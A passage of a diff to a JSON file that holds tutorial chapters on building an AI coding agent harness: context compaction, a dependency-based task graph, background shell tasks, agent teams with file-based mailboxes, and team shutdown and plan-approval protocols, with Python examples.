yes\n | |\n v v\ncontinue [Layer 2: auto_compact]\n Save transcript to .transcripts/\n LLM summarizes conversation.\n Replace all messages with [summary].\n |\n v\n [Layer 3: compact tool]\n Model calls compact explicitly.\n Same summarization as auto_compact.\n```\n\n## How It Works\n\n1. **Layer 1 -- micro_compact**: Before each LLM call, replace old tool results with placeholders.\n\n```python\ndef micro_compact(messages: list) -> list:\n tool_results = []\n for i, msg in enumerate(messages):\n if msg[\"role\"] == \"user\" and isinstance(msg.get(\"content\"), list):\n for j, part in enumerate(msg[\"content\"]):\n if isinstance(part, dict) and part.get(\"type\") == \"tool_result\":\n tool_results.append((i, j, part))\n if len(tool_results) <= KEEP_RECENT:\n return messages\n for _, _, part in tool_results[:-KEEP_RECENT]:\n if len(part.get(\"content\", \"\")) > 100:\n part[\"content\"] = f\"[Previous: used {tool_name}]\"\n return messages\n```\n\n2. **Layer 2 -- auto_compact**: When tokens exceed threshold, save full transcript to disk, then ask the LLM to summarize.\n\n```python\ndef auto_compact(messages: list) -> list:\n # Save transcript for recovery\n transcript_path = TRANSCRIPT_DIR / f\"transcript_{int(time.time())}.jsonl\"\n with open(transcript_path, \"w\") as f:\n for msg in messages:\n f.write(json.dumps(msg, default=str) + \"\\n\")\n # LLM summarizes\n response = client.messages.create(\n model=MODEL,\n messages=[{\"role\": \"user\", \"content\":\n \"Summarize this conversation for continuity...\"\n + json.dumps(messages, default=str)[:80000]}],\n max_tokens=2000,\n )\n return [\n {\"role\": \"user\", \"content\": f\"[Compressed]\\n\\n{response.content[0].text}\"},\n {\"role\": \"assistant\", \"content\": \"Understood. Continuing.\"},\n ]\n```\n\n3. **Layer 3 -- manual compact**: The `compact` tool triggers the same summarization on demand.\n\n4. The loop integrates all three:\n\n```python\ndef agent_loop(messages: list):\n while True:\n micro_compact(messages) # Layer 1\n if estimate_tokens(messages) > THRESHOLD:\n messages[:] = auto_compact(messages) # Layer 2\n response = client.messages.create(...)\n # ... tool execution ...\n if manual_compact:\n messages[:] = auto_compact(messages) # Layer 3\n```\n\nTranscripts preserve full history on disk. Nothing is truly lost -- just moved out of active context.\n\n## What Changed From s05\n\n| Component | Before (s05) | After (s06) |\n|----------------|------------------|----------------------------|\n| Tools | 5 | 5 (base + compact) |\n| Context mgmt | None | Three-layer compression |\n| Micro-compact | None | Old results -> placeholders|\n| Auto-compact | None | Token threshold trigger |\n| Transcripts | None | Saved to .transcripts/ |\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s06_context_compact.py\n```\n\n1. `Read every Python file in the agents/ directory one by one` (watch micro-compact replace old results)\n2. `Keep reading files until compression triggers automatically`\n3. `Use the compact tool to manually compress the conversation`\n" + "content": "# s06: Context Compact\n\n`s01 > s02 > s03 > s04 > s05 > [ s06 ] | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"Context will fill up; you need a way to make room\"* -- three-layer compression strategy for infinite sessions.\n>\n> **Harness layer**: Compression -- clean memory for infinite sessions.\n\n## Problem\n\nThe context window is finite. A single `read_file` on a 1000-line file costs ~4000 tokens. After reading 30 files and running 20 bash commands, you hit 100,000+ tokens. The agent cannot work on large codebases without compression.\n\n## Solution\n\nThree layers, increasing in aggressiveness:\n\n```\nEvery turn:\n+------------------+\n| Tool call result |\n+------------------+\n |\n v\n[Layer 1: micro_compact] (silent, every turn)\n Replace tool_result > 3 turns old\n with \"[Previous: used {tool_name}]\"\n |\n v\n[Check: tokens > 50000?]\n | |\n no yes\n | |\n v v\ncontinue [Layer 2: auto_compact]\n Save transcript to .transcripts/\n LLM summarizes conversation.\n Replace all messages with [summary].\n |\n v\n [Layer 3: compact tool]\n Model calls compact explicitly.\n Same summarization as auto_compact.\n```\n\n## How It Works\n\n1. **Layer 1 -- micro_compact**: Before each LLM call, replace old tool results with placeholders.\n\n```python\ndef micro_compact(messages: list) -> list:\n tool_results = []\n for i, msg in enumerate(messages):\n if msg[\"role\"] == \"user\" and isinstance(msg.get(\"content\"), list):\n for j, part in enumerate(msg[\"content\"]):\n if isinstance(part, dict) and part.get(\"type\") == \"tool_result\":\n tool_results.append((i, j, part))\n if len(tool_results) <= KEEP_RECENT:\n return messages\n for _, _, part in tool_results[:-KEEP_RECENT]:\n if len(part.get(\"content\", \"\")) > 100:\n part[\"content\"] = f\"[Previous: used {tool_name}]\"\n return messages\n```\n\n2. **Layer 2 -- auto_compact**: When tokens exceed threshold, save full transcript to disk, then ask the LLM to summarize.\n\n```python\ndef auto_compact(messages: list) -> list:\n # Save transcript for recovery\n transcript_path = TRANSCRIPT_DIR / f\"transcript_{int(time.time())}.jsonl\"\n with open(transcript_path, \"w\") as f:\n for msg in messages:\n f.write(json.dumps(msg, default=str) + \"\\n\")\n # LLM summarizes\n response = client.messages.create(\n model=MODEL,\n messages=[{\"role\": \"user\", \"content\":\n \"Summarize this conversation for continuity...\"\n + json.dumps(messages, default=str)[:80000]}],\n max_tokens=2000,\n )\n return [\n {\"role\": \"user\", \"content\": f\"[Compressed]\\n\\n{response.content[0].text}\"},\n ]\n```\n\n3. **Layer 3 -- manual compact**: The `compact` tool triggers the same summarization on demand.\n\n4. The loop integrates all three:\n\n```python\ndef agent_loop(messages: list):\n while True:\n micro_compact(messages) # Layer 1\n if estimate_tokens(messages) > THRESHOLD:\n messages[:] = auto_compact(messages) # Layer 2\n response = client.messages.create(...)\n # ... tool execution ...\n if manual_compact:\n messages[:] = auto_compact(messages) # Layer 3\n```\n\nTranscripts preserve full history on disk. Nothing is truly lost -- just moved out of active context.\n\n## What Changed From s05\n\n| Component | Before (s05) | After (s06) |\n|----------------|------------------|----------------------------|\n| Tools | 5 | 5 (base + compact) |\n| Context mgmt | None | Three-layer compression |\n| Micro-compact | None | Old results -> placeholders|\n| Auto-compact | None | Token threshold trigger |\n| Transcripts | None | Saved to .transcripts/ |\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s06_context_compact.py\n```\n\n1. `Read every Python file in the agents/ directory one by one` (watch micro-compact replace old results)\n2. `Keep reading files until compression triggers automatically`\n3. `Use the compact tool to manually compress the conversation`\n" }, { "version": "s07", "locale": "en", "title": "s07: Task System", - "content": "# s07: Task System\n\n`s01 > s02 > s03 > s04 > s05 > s06 | [ s07 ] s08 > s09 > s10 > s11 > s12`\n\n> *\"Break big goals into small tasks, order them, persist to disk\"* -- a file-based task graph with dependencies, laying the foundation for multi-agent collaboration.\n\n## Problem\n\ns03's TodoManager is a flat checklist in memory: no ordering, no dependencies, no status beyond done-or-not. Real goals have structure -- task B depends on task A, tasks C and D can run in parallel, task E waits for both C and D.\n\nWithout explicit relationships, the agent can't tell what's ready, what's blocked, or what can run concurrently. And because the list lives only in memory, context compression (s06) wipes it clean.\n\n## Solution\n\nPromote the checklist into a **task graph** persisted to disk. Each task is a JSON file with status, dependencies (`blockedBy`), and dependents (`blocks`). The graph answers three questions at any moment:\n\n- **What's ready?** -- tasks with `pending` status and empty `blockedBy`.\n- **What's blocked?** -- tasks waiting on unfinished dependencies.\n- **What's done?** -- `completed` tasks, whose completion automatically unblocks dependents.\n\n```\n.tasks/\n task_1.json {\"id\":1, \"status\":\"completed\"}\n task_2.json {\"id\":2, \"blockedBy\":[1], \"status\":\"pending\"}\n task_3.json {\"id\":3, \"blockedBy\":[1], \"status\":\"pending\"}\n task_4.json {\"id\":4, \"blockedBy\":[2,3], \"status\":\"pending\"}\n\nTask graph (DAG):\n +----------+\n +--> | task 2 | --+\n | | pending | |\n+----------+ +----------+ +--> +----------+\n| task 1 | | task 4 |\n| completed| --> +----------+ +--> | blocked |\n+----------+ | task 3 | --+ +----------+\n | pending |\n +----------+\n\nOrdering: task 1 must finish before 2 and 3\nParallelism: tasks 2 and 3 can run at the same time\nDependencies: task 4 waits for both 2 and 3\nStatus: pending -> in_progress -> completed\n```\n\nThis task graph becomes the coordination backbone for everything after s07: background execution (s08), multi-agent teams (s09+), and worktree isolation (s12) all read from and write to this same structure.\n\n## How It Works\n\n1. **TaskManager**: one JSON file per task, CRUD with dependency graph.\n\n```python\nclass TaskManager:\n def __init__(self, tasks_dir: Path):\n self.dir = tasks_dir\n self.dir.mkdir(exist_ok=True)\n self._next_id = self._max_id() + 1\n\n def create(self, subject, description=\"\"):\n task = {\"id\": self._next_id, \"subject\": subject,\n \"status\": \"pending\", \"blockedBy\": [],\n \"blocks\": [], \"owner\": \"\"}\n self._save(task)\n self._next_id += 1\n return json.dumps(task, indent=2)\n```\n\n2. **Dependency resolution**: completing a task clears its ID from every other task's `blockedBy` list, automatically unblocking dependents.\n\n```python\ndef _clear_dependency(self, completed_id):\n for f in self.dir.glob(\"task_*.json\"):\n task = json.loads(f.read_text())\n if completed_id in task.get(\"blockedBy\", []):\n task[\"blockedBy\"].remove(completed_id)\n self._save(task)\n```\n\n3. **Status + dependency wiring**: `update` handles transitions and dependency edges.\n\n```python\ndef update(self, task_id, status=None,\n add_blocked_by=None, add_blocks=None):\n task = self._load(task_id)\n if status:\n task[\"status\"] = status\n if status == \"completed\":\n self._clear_dependency(task_id)\n self._save(task)\n```\n\n4. Four task tools go into the dispatch map.\n\n```python\nTOOL_HANDLERS = {\n # ...base tools...\n \"task_create\": lambda **kw: TASKS.create(kw[\"subject\"]),\n \"task_update\": lambda **kw: TASKS.update(kw[\"task_id\"], kw.get(\"status\")),\n \"task_list\": lambda **kw: TASKS.list_all(),\n \"task_get\": lambda **kw: TASKS.get(kw[\"task_id\"]),\n}\n```\n\nFrom s07 onward, the task graph is the default for multi-step work. s03's Todo remains for quick single-session checklists.\n\n## What Changed From s06\n\n| Component | Before (s06) | After (s07) |\n|---|---|---|\n| Tools | 5 | 8 (`task_create/update/list/get`) |\n| Planning model | Flat checklist (in-memory) | Task graph with dependencies (on disk) |\n| Relationships | None | `blockedBy` + `blocks` edges |\n| Status tracking | Done or not | `pending` -> `in_progress` -> `completed` |\n| Persistence | Lost on compression | Survives compression and restarts |\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s07_task_system.py\n```\n\n1. `Create 3 tasks: \"Setup project\", \"Write code\", \"Write tests\". Make them depend on each other in order.`\n2. `List all tasks and show the dependency graph`\n3. `Complete task 1 and then list tasks to see task 2 unblocked`\n4. `Create a task board for refactoring: parse -> transform -> emit -> test, where transform and emit can run in parallel after parse`\n" + "content": "# s07: Task System\n\n`s01 > s02 > s03 > s04 > s05 > s06 | [ s07 ] s08 > s09 > s10 > s11 > s12`\n\n> *\"Break big goals into small tasks, order them, persist to disk\"* -- a file-based task graph with dependencies, laying the foundation for multi-agent collaboration.\n>\n> **Harness layer**: Persistent tasks -- goals that outlive any single conversation.\n\n## Problem\n\ns03's TodoManager is a flat checklist in memory: no ordering, no dependencies, no status beyond done-or-not. Real goals have structure -- task B depends on task A, tasks C and D can run in parallel, task E waits for both C and D.\n\nWithout explicit relationships, the agent can't tell what's ready, what's blocked, or what can run concurrently. And because the list lives only in memory, context compression (s06) wipes it clean.\n\n## Solution\n\nPromote the checklist into a **task graph** persisted to disk. Each task is a JSON file with status, dependencies (`blockedBy`). The graph answers three questions at any moment:\n\n- **What's ready?** -- tasks with `pending` status and empty `blockedBy`.\n- **What's blocked?** -- tasks waiting on unfinished dependencies.\n- **What's done?** -- `completed` tasks, whose completion automatically unblocks dependents.\n\n```\n.tasks/\n task_1.json {\"id\":1, \"status\":\"completed\"}\n task_2.json {\"id\":2, \"blockedBy\":[1], \"status\":\"pending\"}\n task_3.json {\"id\":3, \"blockedBy\":[1], \"status\":\"pending\"}\n task_4.json {\"id\":4, \"blockedBy\":[2,3], \"status\":\"pending\"}\n\nTask graph (DAG):\n +----------+\n +--> | task 2 | --+\n | | pending | |\n+----------+ +----------+ +--> +----------+\n| task 1 | | task 4 |\n| completed| --> +----------+ +--> | blocked |\n+----------+ | task 3 | --+ +----------+\n | pending |\n +----------+\n\nOrdering: task 1 must finish before 2 and 3\nParallelism: tasks 2 and 3 can run at the same time\nDependencies: task 4 waits for both 2 and 3\nStatus: pending -> in_progress -> completed\n```\n\nThis task graph becomes the coordination backbone for everything after s07: background execution (s08), multi-agent teams (s09+), and worktree isolation (s12) all read from and write to this same structure.\n\n## How It Works\n\n1. **TaskManager**: one JSON file per task, CRUD with dependency graph.\n\n```python\nclass TaskManager:\n def __init__(self, tasks_dir: Path):\n self.dir = tasks_dir\n self.dir.mkdir(exist_ok=True)\n self._next_id = self._max_id() + 1\n\n def create(self, subject, description=\"\"):\n task = {\"id\": self._next_id, \"subject\": subject,\n \"status\": \"pending\", \"blockedBy\": [],\n \"owner\": \"\"}\n self._save(task)\n self._next_id += 1\n return json.dumps(task, indent=2)\n```\n\n2. **Dependency resolution**: completing a task clears its ID from every other task's `blockedBy` list, automatically unblocking dependents.\n\n```python\ndef _clear_dependency(self, completed_id):\n for f in self.dir.glob(\"task_*.json\"):\n task = json.loads(f.read_text())\n if completed_id in task.get(\"blockedBy\", []):\n task[\"blockedBy\"].remove(completed_id)\n self._save(task)\n```\n\n3. **Status + dependency wiring**: `update` handles transitions and dependency edges.\n\n```python\ndef update(self, task_id, status=None,\n add_blocked_by=None, remove_blocked_by=None):\n task = self._load(task_id)\n if status:\n task[\"status\"] = status\n if status == \"completed\":\n self._clear_dependency(task_id)\n if add_blocked_by:\n task[\"blockedBy\"] = list(set(task[\"blockedBy\"] + add_blocked_by))\n if remove_blocked_by:\n task[\"blockedBy\"] = [x for x in task[\"blockedBy\"] if x not in remove_blocked_by]\n self._save(task)\n```\n\n4. Four task tools go into the dispatch map.\n\n```python\nTOOL_HANDLERS = {\n # ...base tools...\n \"task_create\": lambda **kw: TASKS.create(kw[\"subject\"]),\n \"task_update\": lambda **kw: TASKS.update(kw[\"task_id\"], kw.get(\"status\")),\n \"task_list\": lambda **kw: TASKS.list_all(),\n \"task_get\": lambda **kw: TASKS.get(kw[\"task_id\"]),\n}\n```\n\nFrom s07 onward, the task graph is the default for multi-step work. s03's Todo remains for quick single-session checklists.\n\n## What Changed From s06\n\n| Component | Before (s06) | After (s07) |\n|---|---|---|\n| Tools | 5 | 8 (`task_create/update/list/get`) |\n| Planning model | Flat checklist (in-memory) | Task graph with dependencies (on disk) |\n| Relationships | None | `blockedBy` edges |\n| Status tracking | Done or not | `pending` -> `in_progress` -> `completed` |\n| Persistence | Lost on compression | Survives compression and restarts |\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s07_task_system.py\n```\n\n1. `Create 3 tasks: \"Setup project\", \"Write code\", \"Write tests\". Make them depend on each other in order.`\n2. `List all tasks and show the dependency graph`\n3. `Complete task 1 and then list tasks to see task 2 unblocked`\n4. `Create a task board for refactoring: parse -> transform -> emit -> test, where transform and emit can run in parallel after parse`\n" }, { "version": "s08", "locale": "en", "title": "s08: Background Tasks", - "content": "# s08: Background Tasks\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > [ s08 ] s09 > s10 > s11 > s12`\n\n> *\"Run slow operations in the background; the agent keeps thinking\"* -- daemon threads run commands, inject notifications on completion.\n\n## Problem\n\nSome commands take minutes: `npm install`, `pytest`, `docker build`. With a blocking loop, the model sits idle waiting. If the user asks \"install dependencies and while that runs, create the config file,\" the agent does them sequentially, not in parallel.\n\n## Solution\n\n```\nMain thread Background thread\n+-----------------+ +-----------------+\n| agent loop | | subprocess runs |\n| ... | | ... |\n| [LLM call] <---+------- | enqueue(result) |\n| ^drain queue | +-----------------+\n+-----------------+\n\nTimeline:\nAgent --[spawn A]--[spawn B]--[other work]----\n | |\n v v\n [A runs] [B runs] (parallel)\n | |\n +-- results injected before next LLM call --+\n```\n\n## How It Works\n\n1. BackgroundManager tracks tasks with a thread-safe notification queue.\n\n```python\nclass BackgroundManager:\n def __init__(self):\n self.tasks = {}\n self._notification_queue = []\n self._lock = threading.Lock()\n```\n\n2. `run()` starts a daemon thread and returns immediately.\n\n```python\ndef run(self, command: str) -> str:\n task_id = str(uuid.uuid4())[:8]\n self.tasks[task_id] = {\"status\": \"running\", \"command\": command}\n thread = threading.Thread(\n target=self._execute, args=(task_id, command), daemon=True)\n thread.start()\n return f\"Background task {task_id} started\"\n```\n\n3. When the subprocess finishes, its result goes into the notification queue.\n\n```python\ndef _execute(self, task_id, command):\n try:\n r = subprocess.run(command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=300)\n output = (r.stdout + r.stderr).strip()[:50000]\n except subprocess.TimeoutExpired:\n output = \"Error: Timeout (300s)\"\n with self._lock:\n self._notification_queue.append({\n \"task_id\": task_id, \"result\": output[:500]})\n```\n\n4. The agent loop drains notifications before each LLM call.\n\n```python\ndef agent_loop(messages: list):\n while True:\n notifs = BG.drain_notifications()\n if notifs:\n notif_text = \"\\n\".join(\n f\"[bg:{n['task_id']}] {n['result']}\" for n in notifs)\n messages.append({\"role\": \"user\",\n \"content\": f\"\\n{notif_text}\\n\"\n f\"\"})\n messages.append({\"role\": \"assistant\",\n \"content\": \"Noted background results.\"})\n response = client.messages.create(...)\n```\n\nThe loop stays single-threaded. Only subprocess I/O is parallelized.\n\n## What Changed From s07\n\n| Component | Before (s07) | After (s08) |\n|----------------|------------------|----------------------------|\n| Tools | 8 | 6 (base + background_run + check)|\n| Execution | Blocking only | Blocking + background threads|\n| Notification | None | Queue drained per loop |\n| Concurrency | None | Daemon threads |\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s08_background_tasks.py\n```\n\n1. `Run \"sleep 5 && echo done\" in the background, then create a file while it runs`\n2. `Start 3 background tasks: \"sleep 2\", \"sleep 4\", \"sleep 6\". Check their status.`\n3. `Run pytest in the background and keep working on other things`\n" + "content": "# s08: Background Tasks\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > [ s08 ] s09 > s10 > s11 > s12`\n\n> *\"Run slow operations in the background; the agent keeps thinking\"* -- daemon threads run commands, inject notifications on completion.\n>\n> **Harness layer**: Background execution -- the model thinks while the harness waits.\n\n## Problem\n\nSome commands take minutes: `npm install`, `pytest`, `docker build`. With a blocking loop, the model sits idle waiting. If the user asks \"install dependencies and while that runs, create the config file,\" the agent does them sequentially, not in parallel.\n\n## Solution\n\n```\nMain thread Background thread\n+-----------------+ +-----------------+\n| agent loop | | subprocess runs |\n| ... | | ... |\n| [LLM call] <---+------- | enqueue(result) |\n| ^drain queue | +-----------------+\n+-----------------+\n\nTimeline:\nAgent --[spawn A]--[spawn B]--[other work]----\n | |\n v v\n [A runs] [B runs] (parallel)\n | |\n +-- results injected before next LLM call --+\n```\n\n## How It Works\n\n1. BackgroundManager tracks tasks with a thread-safe notification queue.\n\n```python\nclass BackgroundManager:\n def __init__(self):\n self.tasks = {}\n self._notification_queue = []\n self._lock = threading.Lock()\n```\n\n2. `run()` starts a daemon thread and returns immediately.\n\n```python\ndef run(self, command: str) -> str:\n task_id = str(uuid.uuid4())[:8]\n self.tasks[task_id] = {\"status\": \"running\", \"command\": command}\n thread = threading.Thread(\n target=self._execute, args=(task_id, command), daemon=True)\n thread.start()\n return f\"Background task {task_id} started\"\n```\n\n3. When the subprocess finishes, its result goes into the notification queue.\n\n```python\ndef _execute(self, task_id, command):\n try:\n r = subprocess.run(command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=300)\n output = (r.stdout + r.stderr).strip()[:50000]\n except subprocess.TimeoutExpired:\n output = \"Error: Timeout (300s)\"\n with self._lock:\n self._notification_queue.append({\n \"task_id\": task_id, \"result\": output[:500]})\n```\n\n4. The agent loop drains notifications before each LLM call.\n\n```python\ndef agent_loop(messages: list):\n while True:\n notifs = BG.drain_notifications()\n if notifs:\n notif_text = \"\\n\".join(\n f\"[bg:{n['task_id']}] {n['result']}\" for n in notifs)\n messages.append({\"role\": \"user\",\n \"content\": f\"\\n{notif_text}\\n\"\n f\"\"})\n response = client.messages.create(...)\n```\n\nThe loop stays single-threaded. Only subprocess I/O is parallelized.\n\n## What Changed From s07\n\n| Component | Before (s07) | After (s08) |\n|----------------|------------------|----------------------------|\n| Tools | 8 | 6 (base + background_run + check)|\n| Execution | Blocking only | Blocking + background threads|\n| Notification | None | Queue drained per loop |\n| Concurrency | None | Daemon threads |\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s08_background_tasks.py\n```\n\n1. `Run \"sleep 5 && echo done\" in the background, then create a file while it runs`\n2. `Start 3 background tasks: \"sleep 2\", \"sleep 4\", \"sleep 6\". Check their status.`\n3. `Run pytest in the background and keep working on other things`\n" }, { "version": "s09", "locale": "en", "title": "s09: Agent Teams", - "content": "# s09: Agent Teams\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > [ s09 ] s10 > s11 > s12`\n\n> *\"When the task is too big for one, delegate to teammates\"* -- persistent teammates + async mailboxes.\n\n## Problem\n\nSubagents (s04) are disposable: spawn, work, return summary, die. No identity, no memory between invocations. Background tasks (s08) run shell commands but can't make LLM-guided decisions.\n\nReal teamwork needs: (1) persistent agents that outlive a single prompt, (2) identity and lifecycle management, (3) a communication channel between agents.\n\n## Solution\n\n```\nTeammate lifecycle:\n spawn -> WORKING -> IDLE -> WORKING -> ... -> SHUTDOWN\n\nCommunication:\n .team/\n config.json <- team roster + statuses\n inbox/\n alice.jsonl <- append-only, drain-on-read\n bob.jsonl\n lead.jsonl\n\n +--------+ send(\"alice\",\"bob\",\"...\") +--------+\n | alice | -----------------------------> | bob |\n | loop | bob.jsonl << {json_line} | loop |\n +--------+ +--------+\n ^ |\n | BUS.read_inbox(\"alice\") |\n +---- alice.jsonl -> read + drain ---------+\n```\n\n## How It Works\n\n1. TeammateManager maintains config.json with the team roster.\n\n```python\nclass TeammateManager:\n def __init__(self, team_dir: Path):\n self.dir = team_dir\n self.dir.mkdir(exist_ok=True)\n self.config_path = self.dir / \"config.json\"\n self.config = self._load_config()\n self.threads = {}\n```\n\n2. `spawn()` creates a teammate and starts its agent loop in a thread.\n\n```python\ndef spawn(self, name: str, role: str, prompt: str) -> str:\n member = {\"name\": name, \"role\": role, \"status\": \"working\"}\n self.config[\"members\"].append(member)\n self._save_config()\n thread = threading.Thread(\n target=self._teammate_loop,\n args=(name, role, prompt), daemon=True)\n thread.start()\n return f\"Spawned teammate '{name}' (role: {role})\"\n```\n\n3. MessageBus: append-only JSONL inboxes. `send()` appends a JSON line; `read_inbox()` reads all and drains.\n\n```python\nclass MessageBus:\n def send(self, sender, to, content, msg_type=\"message\", extra=None):\n msg = {\"type\": msg_type, \"from\": sender,\n \"content\": content, \"timestamp\": time.time()}\n if extra:\n msg.update(extra)\n with open(self.dir / f\"{to}.jsonl\", \"a\") as f:\n f.write(json.dumps(msg) + \"\\n\")\n\n def read_inbox(self, name):\n path = self.dir / f\"{name}.jsonl\"\n if not path.exists(): return \"[]\"\n msgs = [json.loads(l) for l in path.read_text().strip().splitlines() if l]\n path.write_text(\"\") # drain\n return json.dumps(msgs, indent=2)\n```\n\n4. Each teammate checks its inbox before every LLM call, injecting received messages into context.\n\n```python\ndef _teammate_loop(self, name, role, prompt):\n messages = [{\"role\": \"user\", \"content\": prompt}]\n for _ in range(50):\n inbox = BUS.read_inbox(name)\n if inbox != \"[]\":\n messages.append({\"role\": \"user\",\n \"content\": f\"{inbox}\"})\n messages.append({\"role\": \"assistant\",\n \"content\": \"Noted inbox messages.\"})\n response = client.messages.create(...)\n if response.stop_reason != \"tool_use\":\n break\n # execute tools, append results...\n self._find_member(name)[\"status\"] = \"idle\"\n```\n\n## What Changed From s08\n\n| Component | Before (s08) | After (s09) |\n|----------------|------------------|----------------------------|\n| Tools | 6 | 9 (+spawn/send/read_inbox) |\n| Agents | Single | Lead + N teammates |\n| Persistence | None | config.json + JSONL inboxes|\n| Threads | Background cmds | Full agent loops per thread|\n| Lifecycle | Fire-and-forget | idle -> working -> idle |\n| Communication | None | message + broadcast |\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s09_agent_teams.py\n```\n\n1. `Spawn alice (coder) and bob (tester). Have alice send bob a message.`\n2. `Broadcast \"status update: phase 1 complete\" to all teammates`\n3. `Check the lead inbox for any messages`\n4. Type `/team` to see the team roster with statuses\n5. Type `/inbox` to manually check the lead's inbox\n" + "content": "# s09: Agent Teams\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > [ s09 ] s10 > s11 > s12`\n\n> *\"When the task is too big for one, delegate to teammates\"* -- persistent teammates + async mailboxes.\n>\n> **Harness layer**: Team mailboxes -- multiple models, coordinated through files.\n\n## Problem\n\nSubagents (s04) are disposable: spawn, work, return summary, die. No identity, no memory between invocations. Background tasks (s08) run shell commands but can't make LLM-guided decisions.\n\nReal teamwork needs: (1) persistent agents that outlive a single prompt, (2) identity and lifecycle management, (3) a communication channel between agents.\n\n## Solution\n\n```\nTeammate lifecycle:\n spawn -> WORKING -> IDLE -> WORKING -> ... -> SHUTDOWN\n\nCommunication:\n .team/\n config.json <- team roster + statuses\n inbox/\n alice.jsonl <- append-only, drain-on-read\n bob.jsonl\n lead.jsonl\n\n +--------+ send(\"alice\",\"bob\",\"...\") +--------+\n | alice | -----------------------------> | bob |\n | loop | bob.jsonl << {json_line} | loop |\n +--------+ +--------+\n ^ |\n | BUS.read_inbox(\"alice\") |\n +---- alice.jsonl -> read + drain ---------+\n```\n\n## How It Works\n\n1. TeammateManager maintains config.json with the team roster.\n\n```python\nclass TeammateManager:\n def __init__(self, team_dir: Path):\n self.dir = team_dir\n self.dir.mkdir(exist_ok=True)\n self.config_path = self.dir / \"config.json\"\n self.config = self._load_config()\n self.threads = {}\n```\n\n2. `spawn()` creates a teammate and starts its agent loop in a thread.\n\n```python\ndef spawn(self, name: str, role: str, prompt: str) -> str:\n member = {\"name\": name, \"role\": role, \"status\": \"working\"}\n self.config[\"members\"].append(member)\n self._save_config()\n thread = threading.Thread(\n target=self._teammate_loop,\n args=(name, role, prompt), daemon=True)\n thread.start()\n return f\"Spawned teammate '{name}' (role: {role})\"\n```\n\n3. MessageBus: append-only JSONL inboxes. `send()` appends a JSON line; `read_inbox()` reads all and drains.\n\n```python\nclass MessageBus:\n def send(self, sender, to, content, msg_type=\"message\", extra=None):\n msg = {\"type\": msg_type, \"from\": sender,\n \"content\": content, \"timestamp\": time.time()}\n if extra:\n msg.update(extra)\n with open(self.dir / f\"{to}.jsonl\", \"a\") as f:\n f.write(json.dumps(msg) + \"\\n\")\n\n def read_inbox(self, name):\n path = self.dir / f\"{name}.jsonl\"\n if not path.exists(): return \"[]\"\n msgs = [json.loads(l) for l in path.read_text().strip().splitlines() if l]\n path.write_text(\"\") # drain\n return json.dumps(msgs, indent=2)\n```\n\n4. Each teammate checks its inbox before every LLM call, injecting received messages into context.\n\n```python\ndef _teammate_loop(self, name, role, prompt):\n messages = [{\"role\": \"user\", \"content\": prompt}]\n for _ in range(50):\n inbox = BUS.read_inbox(name)\n if inbox != \"[]\":\n messages.append({\"role\": \"user\",\n \"content\": f\"{inbox}\"})\n response = client.messages.create(...)\n if response.stop_reason != \"tool_use\":\n break\n # execute tools, append results...\n self._find_member(name)[\"status\"] = \"idle\"\n```\n\n## What Changed From s08\n\n| Component | Before (s08) | After (s09) |\n|----------------|------------------|----------------------------|\n| Tools | 6 | 9 (+spawn/send/read_inbox) |\n| Agents | Single | Lead + N teammates |\n| Persistence | None | config.json + JSONL inboxes|\n| Threads | Background cmds | Full agent loops per thread|\n| Lifecycle | Fire-and-forget | idle -> working -> idle |\n| Communication | None | message + broadcast |\n\n## Try It\n\n```sh\ncd learn-claude-code\npython agents/s09_agent_teams.py\n```\n\n1. `Spawn alice (coder) and bob (tester). Have alice send bob a message.`\n2. `Broadcast \"status update: phase 1 complete\" to all teammates`\n3. `Check the lead inbox for any messages`\n4. Type `/team` to see the team roster with statuses\n5. Type `/inbox` to manually check the lead's inbox\n" }, { "version": "s10", "locale": "en", "title": "s10: Team Protocols", - "content": "# s10: Team Protocols\n\n`s01 > s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > [ s10 ] s11 > s12`\n\n> *\"Teammates need shared communication rules\"* -- one request-response pattern drives all negotiation.\n\n## Problem\n\nIn s09, teammates work and communicate but lack structured coordination:\n\n**Shutdown**: Killing a thread leaves files half-written and config.json stale. You need a handshake: the lead requests, the teammate approves (finish and exit) or rejects (keep working).\n\n**Plan approval**: When the lead says \"refactor the auth module,\" the teammate starts immediately. For high-risk changes, the lead should review the plan first.\n\nBoth share the same structure: one side sends a request with a unique ID, the other responds referencing that ID.\n\n## Solution\n\n```\nShutdown Protocol Plan Approval Protocol\n================== ======================\n\nLead Teammate Teammate Lead\n | | | |\n |--shutdown_req-->| |--plan_req------>|\n | {req_id:\"abc\"} | | {req_id:\"xyz\"} |\n | | | |\n |<--shutdown_resp-| |<--plan_resp-----|\n | {req_id:\"abc\", | | {req_id:\"xyz\", |\n | approve:true} | | approve:true} |\n\nShared FSM:\n [pending] --approve--> [approved]\n [pending] --reject---> [rejected]\n\nTrackers:\n shutdown_requests = {req_id: {target, status}}\n plan_requests = {req_id: {from, plan, status}}\n```\n\n## How It Works\n\n1. The lead initiates shutdown by generating a request_id and sending through the inbox.\n\n```python\nshutdown_requests = {}\n\ndef handle_shutdown_request(teammate: str) -> str:\n req_id = str(uuid.uuid4())[:8]\n shutdown_requests[req_id] = {\"target\": teammate, \"status\": \"pending\"}\n BUS.send(\"lead\", teammate, \"Please shut down gracefully.\",\n \"shutdown_request\", {\"request_id\": req_id})\n return f\"Shutdown request {req_id} sent (status: pending)\"\n```\n\n2. The teammate receives the request and responds with approve/reject.\n\n```python\nif tool_name == \"shutdown_response\":\n req_id = args[\"request_id\"]\n approve = args[\"approve\"]\n shutdown_requests[req_id][\"status\"] = \"approved\" if approve else \"rejected\"\n BUS.send(sender, \"lead\", args.get(\"reason\", \"\"),\n \"shutdown_response\",\n {\"request_id\": req_id, \"approve\": 